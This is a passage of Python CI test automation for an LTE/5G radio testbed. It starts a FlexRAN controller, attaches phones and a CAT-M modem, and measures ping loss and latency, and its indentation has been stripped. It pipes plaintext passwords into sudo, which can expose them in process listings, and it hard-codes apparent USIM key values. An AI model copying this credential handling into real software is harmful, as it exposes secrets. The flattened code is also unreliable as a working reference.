SSH.command('ls -ls /opt/flexran_rtc/*/rt_controller', '\$', 5)
result = re.search('/opt/flexran_rtc/build/rt_controller', SSH.getBefore())
if result is not None:
RAN.flexranCtrlInstalled=True
logging.debug('Flexran Controller is installed')
SSH.close()
def InitializeFlexranCtrl(self):
if RAN.flexranCtrlInstalled == False:
return
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd /opt/flexran_rtc', '\$', 5)
SSH.command('echo ' + EPC.Password + ' | sudo -S rm -f log/*.log', '\$', 5)
SSH.command('echo ' + EPC.Password + ' | sudo -S echo "build/rt_controller -c log_config/basic_log" > ./my-flexran-ctl.sh', '\$', 5)
SSH.command('echo ' + EPC.Password + ' | sudo -S chmod 755 ./my-flexran-ctl.sh', '\$', 5)
SSH.command('echo ' + EPC.Password + ' | sudo -S daemon --unsafe --name=flexran_rtc_daemon --chdir=/opt/flexran_rtc -o /opt/flexran_rtc/log/flexranctl_' + self.testCase_id + '.log ././my-flexran-ctl.sh', '\$', 5)
SSH.command('ps -aux | grep --color=never rt_controller', '\$', 5)
result = re.search('rt_controller -c ', SSH.getBefore())
if result is not None:
logging.debug('\u001B[1m Initialize FlexRan Controller Completed\u001B[0m')
RAN.flexranCtrlStarted=True
SSH.close()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def InitializeUE_common(self, device_id, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if not self.ADBCentralized:
# Reboot UE
#SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesRebootCmd[idx], '\$', 60)
# Wait
#time.sleep(60)
# Put in LTE-Mode only
#SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode 11"\'', '\$', 60)
#SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode1 11"\'', '\$', 60)
#SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode2 11"\'', '\$', 60)
#SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode3 11"\'', '\$', 60)
# enable data service
#SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
# we need to do radio on/off cycle to make sure of above changes
# airplane mode off // radio on
#SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
#time.sleep(10)
# airplane mode on // radio off
#SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
# normal procedure without reboot
# enable data service
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
# airplane mode on // radio off
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
SSH.close()
return
#RH quick add-on to integrate cots control defined by yaml
#if device_id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
#otherwise we use the legacy procedure
if COTS_UE.Check_Exists(device_id):
#switch device to Airplane mode ON (ie Radio OFF)
COTS_UE.Set_Airplane(device_id, 'ON')
else:
# enable data service
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data enable"', '\$', 60)
# The following commands are deprecated since we no longer work on Android 7+
# SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell settings put global airplane_mode_on 1', '\$', 10)
# SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true', '\$', 60)
# a dedicated script has to be installed inside the UE
# airplane mode on means call /data/local/tmp/off
if device_id == '84B7N16418004022':
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
#airplane mode off means call /data/local/tmp/on
logging.debug('\u001B[1mUE (' + device_id + ') Initialize Completed\u001B[0m')
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def InitializeUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.InitializeUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def InitializeOAIUE(self):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
if self.air_interface == 'lte-uesoftmodem':
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow(self.air_interface + ' ' + self.Initialize_OAI_UE_args, 'KO', pStatus)
HTML.CreateHtmlTabFooter(False)
sys.exit(1)
UE_prefix = ''
else:
UE_prefix = 'NR '
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
# b2xx_fx3_utils reset procedure
SSH.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 60)
result = re.search('type: b200', SSH.getBefore())
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
SSH.command('echo ' + self.UEPassword + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
# Reloading FGPA bin firmware
SSH.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 60)
result = re.search('type: n3xx', str(SSH.getBefore()))
if result is not None:
logging.debug('Found a N3xx device --> resetting it')
SSH.command('cd ' + self.UESourceCodePath, '\$', 5)
# Initialize_OAI_UE_args usually start with -C and followed by the location in repository
SSH.command('source oaienv', '\$', 5)
SSH.command('cd cmake_targets/ran_build/build', '\$', 5)
if self.air_interface == 'lte-uesoftmodem':
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
# We may have to regenerate the .u* files
if result is None:
SSH.command('ls /tmp/*.sed', '\$', 5)
result = re.search('adapt_usim_parameters', SSH.getBefore())
if result is not None:
SSH.command('sed -f /tmp/adapt_usim_parameters.sed ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
else:
SSH.command('sed -e "s#93#92#" -e "s#8baf473f2f8fd09487cccbd7097c6862#fec86ba6eb707ed08905757b1bb44b8f#" -e "s#e734f8734007d6c5ce7a0508809e7e9c#C42449363BBAD02B66D16BC975D77CC1#" ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
SSH.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf .u*', '\$', 5)
SSH.command('echo ' + self.UEPassword + ' | sudo -S ../../../targets/bin/conf2uedata -c ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf -o .', '\$', 5)
else:
SSH.command('if [ -e rbconfig.raw ]; then echo ' + self.UEPassword + ' | sudo -S rm rbconfig.raw; fi', '\$', 5)
SSH.command('if [ -e reconfig.raw ]; then echo ' + self.UEPassword + ' | sudo -S rm reconfig.raw; fi', '\$', 5)
# Copy the RAW files from gNB running directory (maybe on another machine)
copyin_res = SSH.copyin(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath + '/cmake_targets/rbconfig.raw', '.')
if (copyin_res == 0):
SSH.copyout(self.UEIPAddress, self.UEUserName, self.UEPassword, './rbconfig.raw', self.UESourceCodePath + '/cmake_targets/ran_build/build')
copyin_res = SSH.copyin(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath + '/cmake_targets/reconfig.raw', '.')
if (copyin_res == 0):
SSH.copyout(self.UEIPAddress, self.UEUserName, self.UEPassword, './reconfig.raw', self.UESourceCodePath + '/cmake_targets/ran_build/build')
SSH.command('echo "ulimit -c unlimited && ./'+ self.air_interface +' ' + self.Initialize_OAI_UE_args + '" > ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
SSH.command('chmod 775 ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
SSH.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log', '\$', 5)
self.UELogFile = 'ue_' + self.testCase_id + '.log'
# We are now looping several times to hope we really sync w/ an eNB
doOutterLoop = True
outterLoopCounter = 5
gotSyncStatus = True
fullSyncStatus = True
while (doOutterLoop):
SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets/ran_build/build', '\$', 5)
SSH.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log', '\$', 5)
SSH.command('echo $USER; nohup sudo -E ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh' + ' > ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log ' + ' 2>&1 &', self.UEUserName, 5)
time.sleep(6)
SSH.command('cd ../..', '\$', 5)
doLoop = True
loopCounter = 10
gotSyncStatus = True
# the 'got sync' message is for the UE threads synchronization
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# Here should never occur
logging.error('"got sync" message never showed!')
gotSyncStatus = False
doLoop = False
continue
SSH.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
if self.air_interface == 'nr-uesoftmodem':
result = re.search('Starting sync detection', SSH.getBefore())
else:
result = re.search('got sync', SSH.getBefore())
if result is None:
time.sleep(10)
else:
doLoop = False
logging.debug('Found "got sync" message!')
if gotSyncStatus == False:
# we certainly need to stop the lte-uesoftmodem process if it is still running!
SSH.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('-uesoftmodem', SSH.getBefore())
if result is not None:
SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT -r *-uesoftmodem', '\$', 4)
time.sleep(3)
outterLoopCounter = outterLoopCounter - 1
if (outterLoopCounter == 0):
doOutterLoop = False
continue
# We are now checking if sync w/ eNB DOES NOT OCCUR
# Usually during the cell synchronization stage, the UE returns with No cell synchronization message
# That is the case for LTE
# In NR case, it's a positive message that will show if synchronization occurs
doLoop = True
if self.air_interface == 'nr-uesoftmodem':
loopCounter = 10
else:
# We are now checking if sync w/ eNB DOES NOT OCCUR
# Usually during the cell synchronization stage, the UE returns with No cell synchronization message
loopCounter = 10
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
if self.air_interface == 'nr-uesoftmodem':
# Here we do have great chances that UE did NOT cell-sync w/ gNB
doLoop = False
fullSyncStatus = False
logging.debug('Never seen the NR-Sync message (Measured Carrier Frequency) --> try again')
time.sleep(6)
# Stopping the NR-UE
SSH.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('nr-uesoftmodem', SSH.getBefore())
if result is not None:
SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT nr-uesoftmodem', '\$', 4)
time.sleep(6)
else:
# Here we do have a great chance that the UE did cell-sync w/ eNB
doLoop = False
doOutterLoop = False
fullSyncStatus = True
continue
SSH.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync|Frequency"', '\$', 4)
if self.air_interface == 'nr-uesoftmodem':
# Positive messaging -->
result = re.search('Measured Carrier Frequency', SSH.getBefore())
if result is not None:
doLoop = False
doOutterLoop = False
fullSyncStatus = True
else:
time.sleep(6)
else:
# Negative messaging -->
result = re.search('No cell synchronization found', SSH.getBefore())
if result is None:
time.sleep(6)
else:
doLoop = False
fullSyncStatus = False
logging.debug('Found: "No cell synchronization" message! --> try again')
time.sleep(6)
SSH.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('lte-uesoftmodem', SSH.getBefore())
if result is not None:
SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
outterLoopCounter = outterLoopCounter - 1
if (outterLoopCounter == 0):
doOutterLoop = False
if fullSyncStatus and gotSyncStatus:
doInterfaceCheck = False
if self.air_interface == 'lte-uesoftmodem':
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
doInterfaceCheck = True
# For the moment, only in explicit noS1 without kernel module (ie w/ tunnel interface)
if self.air_interface == 'nr-uesoftmodem':
result = re.search('--noS1 --nokrnmod 1', str(self.Initialize_OAI_UE_args))
if result is not None:
doInterfaceCheck = True
if doInterfaceCheck:
SSH.command('ifconfig oaitun_ue1', '\$', 4)
SSH.command('ifconfig oaitun_ue1', '\$', 4)
# ifconfig output is different between ubuntu 16 and ubuntu 18
result = re.search('inet addr:1|inet 1', SSH.getBefore())
if result is not None:
logging.debug('\u001B[1m oaitun_ue1 interface is mounted and configured\u001B[0m')
tunnelInterfaceStatus = True
else:
logging.debug(SSH.getBefore())
logging.error('\u001B[1m oaitun_ue1 interface is either NOT mounted or NOT configured\u001B[0m')
tunnelInterfaceStatus = False
if RAN.eNBmbmsEnables[0]:
SSH.command('ifconfig oaitun_uem1', '\$', 4)
result = re.search('inet addr', SSH.getBefore())
if result is not None:
logging.debug('\u001B[1m oaitun_uem1 interface is mounted and configured\u001B[0m')
tunnelInterfaceStatus = tunnelInterfaceStatus and True
else:
logging.error('\u001B[1m oaitun_uem1 interface is either NOT mounted or NOT configured\u001B[0m')
tunnelInterfaceStatus = False
else:
tunnelInterfaceStatus = True
else:
tunnelInterfaceStatus = True
SSH.close()
if fullSyncStatus and gotSyncStatus and tunnelInterfaceStatus:
HTML.CreateHtmlTestRow(self.air_interface + ' ' + self.Initialize_OAI_UE_args, 'OK', CONST.ALL_PROCESSES_OK, 'OAI UE')
logging.debug('\u001B[1m Initialize OAI UE Completed\u001B[0m')
if (self.ADBIPAddress != 'none'):
self.UEDevices = []
self.UEDevices.append('OAI-UE')
self.UEDevicesStatus = []
self.UEDevicesStatus.append(CONST.UE_STATUS_DETACHED)
else:
if self.air_interface == 'lte-uesoftmodem':
if RAN.eNBmbmsEnables[0]:
HTML.htmlUEFailureMsg='oaitun_ue1/oaitun_uem1 interfaces are either NOT mounted or NOT configured'
else:
HTML.htmlUEFailureMsg='oaitun_ue1 interface is either NOT mounted or NOT configured'
HTML.CreateHtmlTestRow(self.air_interface + ' ' + self.Initialize_OAI_UE_args, 'KO', CONST.OAI_UE_PROCESS_NO_TUNNEL_INTERFACE, 'OAI UE')
else:
HTML.htmlUEFailureMsg='nr-uesoftmodem did NOT synced'
HTML.CreateHtmlTestRow(self.air_interface + ' ' + self.Initialize_OAI_UE_args, 'KO', CONST.OAI_UE_PROCESS_COULD_NOT_SYNC, 'OAI UE')
logging.error('\033[91mInitialize OAI UE Failed! \033[0m')
self.AutoTerminateUEandeNB()
def checkDevTTYisUnlocked(self):
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
count = 0
while count < 5:
SSH.command('echo ' + self.ADBPassword + ' | sudo -S lsof | grep ttyUSB0', '\$', 10)
result = re.search('picocom', SSH.getBefore())
if result is None:
count = 10
else:
time.sleep(5)
count = count + 1
SSH.close()
def InitializeCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.enablePicocomClosure()
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
SSH.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
SSH.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
SSH.command('AT', 'OK|ERROR', 5)
SSH.command('AT', 'OK', 5)
# Doing a power cycle
SSH.command('AT^RESET', 'SIMSTORE,READY', 15)
SSH.command('AT', 'OK|ERROR', 5)
SSH.command('AT', 'OK', 5)
SSH.command('ATE1', 'OK', 5)
# Disabling the Radio
SSH.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
# Checking if auto-attach is enabled
SSH.command('AT^AUTOATT?', 'OK', 5)
result = re.search('AUTOATT: (?P<state>[0-9\-]+)', SSH.getBefore())
if result is not None:
if result.group('state') is not None:
autoAttachState = int(result.group('state'))
if autoAttachState is not None:
if autoAttachState == 0:
SSH.command('AT^AUTOATT=1', 'OK', 5)
logging.debug('\u001B[1m Auto-Attach enabled\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Could not check Auto-Attach! \u001B[0m')
# Force closure of picocom but device might still be locked
SSH.close()
SSH.disablePicocomClosure()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def TerminateCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.enablePicocomClosure()
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
SSH.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
SSH.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
SSH.command('AT', 'OK|ERROR', 5)
SSH.command('AT', 'OK', 5)
# Disabling the Radio
SSH.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
SSH.close()
SSH.disablePicocomClosure()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def AttachCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.enablePicocomClosure()
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
SSH.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
SSH.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
SSH.command('AT', 'OK|ERROR', 5)
SSH.command('AT', 'OK', 5)
# Enabling the Radio
SSH.command('AT+CFUN=1', 'SIMSTORE,READY', 5)
logging.debug('\u001B[1m Cellular Functionality enabled\u001B[0m')
time.sleep(4)
# We should check if we register
count = 0
attach_cnt = 0
attach_status = False
while count < 5:
SSH.command('AT+CEREG?', 'OK', 5)
result = re.search('CEREG: 2,(?P<state>[0-9\-]+),', SSH.getBefore())
if result is not None:
mDataConnectionState = int(result.group('state'))
if mDataConnectionState is not None:
if mDataConnectionState == 1:
count = 10
attach_status = True
result = re.search('CEREG: 2,1,"(?P<networky>[0-9A-Z]+)","(?P<networkz>[0-9A-Z]+)"', SSH.getBefore())
if result is not None:
networky = result.group('networky')
networkz = result.group('networkz')
logging.debug('\u001B[1m CAT-M module attached to eNB (' + str(networky) + '/' + str(networkz) + ')\u001B[0m')
else:
logging.debug('\u001B[1m CAT-M module attached to eNB\u001B[0m')
else:
logging.debug('+CEREG: 2,' + str(mDataConnectionState))
attach_cnt = attach_cnt + 1
else:
logging.debug(SSH.getBefore())
attach_cnt = attach_cnt + 1
count = count + 1
time.sleep(1)
if attach_status:
SSH.command('AT+CESQ', 'OK', 5)
result = re.search('CESQ: 99,99,255,255,(?P<rsrq>[0-9]+),(?P<rsrp>[0-9]+)', SSH.getBefore())
if result is not None:
nRSRQ = int(result.group('rsrq'))
nRSRP = int(result.group('rsrp'))
if (nRSRQ is not None) and (nRSRP is not None):
logging.debug(' RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB')
logging.debug(' RSRP = ' + str(-140+nRSRP) + ' dBm')
SSH.close()
SSH.disablePicocomClosure()
html_queue = SimpleQueue()
self.checkDevTTYisUnlocked()
if attach_status:
html_cell = '<pre style="background-color:white">CAT-M module Attachment Completed in ' + str(attach_cnt+4) + ' seconds'
if (nRSRQ is not None) and (nRSRP is not None):
html_cell += '\n RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB'
html_cell += '\n RSRP = ' + str(-140+nRSRP) + ' dBm</pre>'
else:
html_cell += '</pre>'
html_queue.put(html_cell)
HTML.CreateHtmlTestRowQueue('N/A', 'OK', 1, html_queue)
else:
logging.error('\u001B[1m CAT-M module Attachment Failed\u001B[0m')
html_cell = '<pre style="background-color:white">CAT-M module Attachment Failed</pre>'
html_queue.put(html_cell)
HTML.CreateHtmlTestRowQueue('N/A', 'KO', 1, html_queue)
self.AutoTerminateUEandeNB()
def PingCatM(self):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
try:
statusQueue = SimpleQueue()
lock = Lock()
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd ' + EPC.SourceCodePath, '\$', 5)
SSH.command('cd scripts', '\$', 5)
if re.match('OAI', EPC.Type, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS: not implemented yet')
HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
HTML.CreateHtmlTabFooter(False)
sys.exit(1)
else:
SSH.command('egrep --color=never "Allocated ipv4 addr" /opt/ltebox/var/log/xGwLog.0', '\$', 5)
result = re.search('Allocated ipv4 addr: (?P<ipaddr>[0-9\.]+) from Pool', SSH.getBefore())
if result is not None:
moduleIPAddr = result.group('ipaddr')
else:
HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ping_time = re.findall("-c (\d+)",str(self.ping_args))
device_id = 'catm'
ping_status = SSH.command('stdbuf -o0 ping ' + self.ping_args + ' ' + str(moduleIPAddr) + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(moduleIPAddr) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', SSH.getBefore())
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', SSH.getBefore())
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + moduleIPAddr + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
lock.release()
SSH.close()
html_cell = '<pre style="background-color:white">CAT-M module\nIP Address : ' + moduleIPAddr + '\n' + qMsg + '</pre>'
statusQueue.put(html_cell)
if (packetLossOK):
HTML.CreateHtmlTestRowQueue(self.ping_args, 'OK', 1, statusQueue)
else:
HTML.CreateHtmlTestRowQueue(self.ping_args, 'KO', 1, statusQueue)
self.AutoTerminateUEandeNB()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE_common(self, device_id, statusQueue, lock, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
#RH quick add on to integrate cots control defined by yaml
#if device Id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
#otherwise we use the legacy procedure
if COTS_UE.Check_Exists(device_id):
#switch device to Airplane mode OFF (ie Radio ON)
COTS_UE.Set_Airplane(device_id, 'OFF')
elif device_id == '84B7N16418004022':
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
else:
# airplane mode off // radio on
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
time.sleep(2)
max_count = 45
count = max_count
while count > 0:
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "dumpsys telephony.registry" | grep -m 1 mDataConnectionState', '\$', 15)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "dumpsys telephony.registry"\' | grep -m 1 mDataConnectionState', '\$', 60)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', SSH.getBefore())
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('mDataConnectionState Not Found!')
lock.release()
break
mDataConnectionState = int(result.group('state'))
if mDataConnectionState == 2:
logging.debug('\u001B[1mUE (' + device_id + ') Attach Completed\u001B[0m')
lock.acquire()
statusQueue.put(max_count - count)
statusQueue.put(device_id)
statusQueue.put('Attach Completed')
lock.release()
break
count = count - 1
if count == 15 or count == 30:
logging.debug('\u001B[1;30;43m Retry UE (' + device_id + ') Flight Mode Off \u001B[0m')
if self.ADBCentralized:
#RH quick add on to intgrate cots control defined by yaml
#if device id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
#otherwise we use the legacy procedure
if COTS_UE.Check_Exists(device_id):
#switch device to Airplane mode ON (ie Radio OFF)
COTS_UE.Set_Airplane(device_id, 'ON')
elif device_id == '84B7N16418004022':
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
time.sleep(0.5)
if self.ADBCentralized:
#RH quick add on to integrate cots control defined by yaml
#if device id exists in yaml dictionary, we execute the new procedre defined incots_ue class
#otherwise we use the legacy procedure
if COTS_UE.Check_Exists(device_id):
#switch device to Airplane mode OFF (ie Radio ON)
COTS_UE.Set_Airplane(device_id, 'OFF')
elif device_id == '84B7N16418004022':
